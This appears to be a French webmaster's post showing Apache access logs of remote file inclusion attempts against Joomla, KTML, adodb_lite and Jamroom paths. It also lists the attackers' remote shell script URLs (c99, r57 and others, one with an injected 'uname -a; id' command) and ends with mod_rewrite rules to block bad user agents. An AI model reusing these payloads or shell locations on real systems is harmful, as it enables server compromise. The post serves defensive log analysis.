121.242.23.205 - - [01/Sep/2010:17:08:32 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:33 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:34 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=scannerz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:35 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:36 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:37 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:37 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:38 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=scannerz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:38 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=scannerz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:39 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:40 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:41 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:41 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:42 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=scannerz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:43 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=scannerz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:44 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:44 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:45 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:46 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:46 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=scannerz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:48 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:50 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:51 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=scannerz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:52 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
121.242.23.205 - - [01/Sep/2010:17:08:54 +0200] "GET /hack/php/liste.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc HTTP/1.1" 200 167207 "-" "Mozilla/5.0"
59.106.19.69 - - [01/Sep/2010:20:47:46 +0200] "GET /hack//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 302 399 "-" "Mozilla/5.0"
59.106.19.69 - - [01/Sep/2010:20:47:46 +0200] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 302 399 "-" "Mozilla/5.0"
59.106.19.69 - - [01/Sep/2010:20:47:47 +0200] "GET /hack/php//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 302 399 "-" "Mozilla/5.0"
109.74.3.219 - - [01/Sep/2010:22:34:10 +0200] "GET /hack/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://loraineandassociates.net/head.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
109.74.3.219 - - [01/Sep/2010:22:34:10 +0200] "GET /hack/php/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://loraineandassociates.net/head.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
109.74.3.219 - - [01/Sep/2010:22:34:10 +0200] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://loraineandassociates.net/head.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
94.158.145.35 - - [01/Sep/2010:23:02:39 +0200] "GET /hack/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://loraineandassociates.net/head.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
94.158.145.35 - - [01/Sep/2010:23:02:39 +0200] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://loraineandassociates.net/head.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
94.158.145.35 - - [01/Sep/2010:23:02:39 +0200] "GET /hack/php/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://loraineandassociates.net/head.txt?? HTTP/1.1" 404 1467 "-" "Mozilla/5.0"
213.196.70.63 - - [02/Sep/2010:00:54:00 +0200] "GET /hack/php/liste.php/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kokuz.justfree.com/podzemlje.txt????? HTTP/1.1" 302 398 "-" "Mozilla/3.0 (compatible; Indy Library)"
213.196.70.63 - - [02/Sep/2010:00:55:20 +0200] "GET /hack/php/liste.php/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kokuz.justfree.com/podzemlje.txt????? HTTP/1.1" 302 398 "-" "Mozilla/3.0 (compatible; Indy Library)"
213.196.70.63 - - [02/Sep/2010:00:56:35 +0200] "GET /hack/php/liste.php/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kokuz.justfree.com/podzemlje.txt????? HTTP/1.1" 302 398 "-" "Mozilla/3.0 (compatible; Indy Library)"
213.196.70.63 - - [02/Sep/2010:00:58:17 +0200] "GET /hack/php/liste.php/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kokuz.justfree.com/podzemlje.txt????? HTTP/1.1" 302 398 "-" "Mozilla/3.0 (compatible; Indy Library)"
211.234.107.233 - - [02/Sep/2010:01:40:35 +0200] "GET /hack/php/liste.php//?_SERVER[DOCUMENT_ROOT]=http://www.as-fan.com/bbs/icon/private_icon/1.txt??? HTTP/1.1" 302 409 "-" "Mozilla/5.0"
211.234.107.233 - - [02/Sep/2010:01:40:35 +0200] "GET /hack//?_SERVER[DOCUMENT_ROOT]=http://www.as-fan.com/bbs/icon/private_icon/1.txt??? HTTP/1.1" 302 409 "-" "Mozilla/5.0"
211.234.107.233 - - [02/Sep/2010:01:40:35 +0200] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.as-fan.com/bbs/icon/private_icon/1.txt??? HTTP/1.1" 302 409 "-" "Mozilla/5.0"
211.234.107.233 - - [02/Sep/2010:01:40:35 +0200] "GET /hack/php//?_SERVER[DOCUMENT_ROOT]=http://www.as-fan.com/bbs/icon/private_icon/1.txt??? HTTP/1.1" 302 409 "-" "Mozilla/5.0"
211.234.107.233 - - [02/Sep/2010:01:40:35 +0200] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.as-fan.com/bbs/icon/private_icon/1.txt??? HTTP/1.1" 302 409 "-" "Mozilla/5.0"
211.234.107.233 - - [02/Sep/2010:01:40:35 +0200] "GET /hack/php//?_SERVER[DOCUMENT_ROOT]=http://www.as-fan.com/bbs/icon/private_icon/1.txt??? HTTP/1.1" 302 409 "-" "Mozilla/5.0"
211.234.107.233 - - [02/Sep/2010:01:40:35 +0200] "GET /hack//?_SERVER[DOCUMENT_ROOT]=http://www.as-fan.com/bbs/icon/private_icon/1.txt??? HTTP/1.1" 302 409 "-" "Mozilla/5.0"
211.234.107.233 - - [02/Sep/2010:01:40:35 +0200] "GET /hack/php/liste.php//?_SERVER[DOCUMENT_ROOT]=http://www.as-fan.com/bbs/icon/private_icon/1.txt??? HTTP/1.1" 302 409 "-" "Mozilla/5.0"
93.150.48.205 - - [02/Sep/2010:22:33:50 +0200] "GET /hack/php/liste.php/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pntz.net/assets/snippets/reflect/.../mam.txt? HTTP/1.1" 200 90857 "-" "Mozilla/3.0 (compatible; Indy Library)"
89.111.176.226 - - [03/Sep/2010:03:52:27 +0200] "GET /hack/php//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://fashiondays.ru/media/system/js/fx29id.txt???? HTTP/1.1" 302 393 "-" "Mozilla/5.0"
89.111.176.226 - - [03/Sep/2010:03:52:27 +0200] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://fashiondays.ru/media/system/js/fx29id.txt???? HTTP/1.1" 302 393 "-" "Mozilla/5.0"
89.111.176.226 - - [03/Sep/2010:03:52:27 +0200] "GET /hack//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://fashiondays.ru/media/system/js/fx29id.txt???? HTTP/1.1" 302 393 "-" "Mozilla/5.0"
89.111.176.226 - - [03/Sep/2010:03:52:27 +0200] "GET /hack/php//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://fashiondays.ru/media/system/js/fx29id.txt???? HTTP/1.1" 302 393 "-" "Mozilla/5.0"
89.111.176.226 - - [03/Sep/2010:03:52:27 +0200] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://fashiondays.ru/media/system/js/fx29id.txt???? HTTP/1.1" 302 393 "-" "Mozilla/5.0"
89.111.176.226 - - [03/Sep/2010:03:52:27 +0200] "GET /hack//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://fashiondays.ru/media/system/js/fx29id.txt???? HTTP/1.1" 302 393 "-" "Mozilla/5.0"
87.9.108.241 - - [03/Sep/2010:05:04:30 +0200] "GET /hack/php/liste.php/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://balkancafe.001webs.com/podzemlje.txt????? HTTP/1.1" 302 402 "-" "Mozilla/3.0 (compatible; Indy Library)"
69.175.39.202 - - [03/Sep/2010:10:33:42 +0200] "GET /hack//errors.php?error=http://knowhow-now.biz/1.txt??? HTTP/1.1" 302 367 "-" "Mozilla/5.0"
69.175.39.202 - - [03/Sep/2010:10:33:42 +0200] "GET //errors.php?error=http://knowhow-now.biz/1.txt??? HTTP/1.1" 302 367 "-" "Mozilla/5.0"
69.175.39.202 - - [03/Sep/2010:10:33:42 +0200] "GET /hack/php//errors.php?error=http://knowhow-now.biz/1.txt??? HTTP/1.1" 302 367 "-" "Mozilla/5.0"
187.79.111.130 - - [03/Sep/2010:13:52:53 +0200] "GET /hack/php/liste.php?lang=http%3A%2F%2Fwww.joaomatosf.com%2Fteste.txt%3F HTTP/1.1" 200 366940 "-" "Jakarta Commons-HttpClient/3.1"
187.79.111.130 - - [03/Sep/2010:13:57:38 +0200] "GET /hack/php/liste.php?lang=http%3A%2F%2Fwww.joaomatosf.com%2Fteste.txt%3F HTTP/1.1" 200 366940 "-" "Jakarta Commons-HttpClient/3.1"
187.79.111.130 - - [03/Sep/2010:13:59:08 +0200] "GET /hack/php/liste.php?lang=http%3A%2F%2Fwww.joaomatosf.com%2Fteste.txt%3F HTTP/1.1" 200 366940 "-" "Jakarta Commons-HttpClient/3.1"
187.79.111.130 - - [03/Sep/2010:14:00:19 +0200] "GET /hack/php/liste.php?lang=http%3A%2F%2Fwww.joaomatosf.com%2Fteste.txt%3F HTTP/1.1" 200 366940 "-" "Jakarta Commons-HttpClient/3.1"
187.79.111.130 - - [03/Sep/2010:14:01:30 +0200] "GET /hack/php/liste.php?lang=http%3A%2F%2Fwww.joaomatosf.com%2Fteste.txt%3F HTTP/1.1" 200 366940 "-" "Jakarta Commons-HttpClient/3.1"
187.79.111.130 - - [03/Sep/2010:14:02:41 +0200] "GET /hack/php/liste.php?lang=http%3A%2F%2Fwww.joaomatosf.com%2Fteste.txt%3F HTTP/1.1" 200 366940 "-" "Jakarta Commons-HttpClient/3.1"
187.79.111.130 - - [03/Sep/2010:14:03:54 +0200] "GET /hack/php/liste.php?lang=http%3A%2F%2Fwww.joaomatosf.com%2Fteste.txt%3F HTTP/1.1" 200 366940 "-" "Jakarta Commons-HttpClient/3.1"
187.79.111.130 - - [03/Sep/2010:14:08:53 +0200] "GET /hack/php/liste.php?lang=http%3A%2F%2Fwww.joaomatosf.com%2Fteste.txt%3F HTTP/1.1" 200 366940 "-" "Jakarta Commons-HttpClient/3.1"
187.79.111.130 - - [03/Sep/2010:14:09:50 +0200] "GET /hack/php/liste.php?lang=http%3A%2F%2Fwww.joaomatosf.com%2Fteste.txt%3F HTTP/1.1" 200 366940 "-" "Jakarta Commons-HttpClient/3.1"
Enregistrement des nouveaux scripts :
http://saldiri.org/c99.txt OK
http://saldiri.org/r57.txt OK
http://islam.shomoo5.com/images/m.txt OK
http://www.c99shell.com/c99.txt OK
http://h1.ripway.com/hak116/gaza.txt OK
http://h1.ripway.com/hak116/gaza.txt%BF OK
http://dover.micfo.com/~couples/public/linuxhak.txt OK
http://alsayad.by.ru/shell/c99.txt OK
http://www.tajima-inaka.net/shop/images/main.txt OK
http://markoffcarpaccio.com/forum/avatars/id2.txt%0D OK
http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt OK
http://infantaterrible.com/hola/id.txt%0D OK
http://127.0.0.1/id.txt OK
http://kamus1.fileave.com/id.txt OK
http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt OK
http://events.tqoa.net/events/language/fr-FR/Ckrid1.txt OK
http://www.froehlich.us/squid/baner.txt OK
http://Anonymouse.org/ OK
http://a-1handymanandremodelinc.com/images/wpThumbnails/s2/s.txt OK
http://jimbaran.fileave.com/Ckrid1.txt OK
http://ma.vvind.com/uploads/php.txt?&cmd=uname%20-a;%20id OK
http://jspo.org/images/gallery/id.txt OK
http://www.yscan.vtrain2u.com/fx29id.txt OK
http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=shellz OK
http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=scannerz OK
http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=botz OK
http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/penyamun.txt??&modez=psybnc OK
http://halusinasi.zoomshare.com/files/code/fx29id1.txt OK
http://loraineandassociates.net/head.txt OK
http://kokuz.justfree.com/podzemlje.txt OK
http://www.as-fan.com/bbs/icon/private_icon/1.txt OK
http://www.pntz.net/assets/snippets/reflect/.../mam.txt OK
http://fashiondays.ru/media/system/js/fx29id.txt OK
http://balkancafe.001webs.com/podzemlje.txt OK
http://knowhow-now.biz/1.txt OK
On constate que de nombreuses injections concernent Joomla, on en parle sur Hack de sites joomla : quels composants sont visés ?
Une méthode simple pour bannir de nombreux attaquants est de les rediriger, depuis la configuration globale de votre serveur web, selon leurs paramétres de connexion, tel que l'agent http : HTTP_USER_AGENT
Voici un simple exemple sur Apache pour bloquer tous ceux qui s'identifient comme des navigateurs nommés : libwww-perl/xxx (ex : libwww-perl/5.79)
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww-perl
RewriteRule .*$ http://immobilier.placeoweb.com [R,L]
Si vous souhaitez en bloquer plusieurs :
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} Kapere [OR]
RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} Microsoft\ URL\ Control
RewriteRule .*$ http://perdu.com [R,L]
Vous pouvez noter ces directives Apache, au choix, dans :
Vous trouverez comment bloquer plus de robots et d'aspirateurs sur http://aide.sivit.fr/index.php?2005/07/25/84-bloquer-les-robots
Et pour l'explication des directives Apache concernées, vive la documentation Apache Module mod_rewrite en anglais, sinon une documention plus ancienne en francais.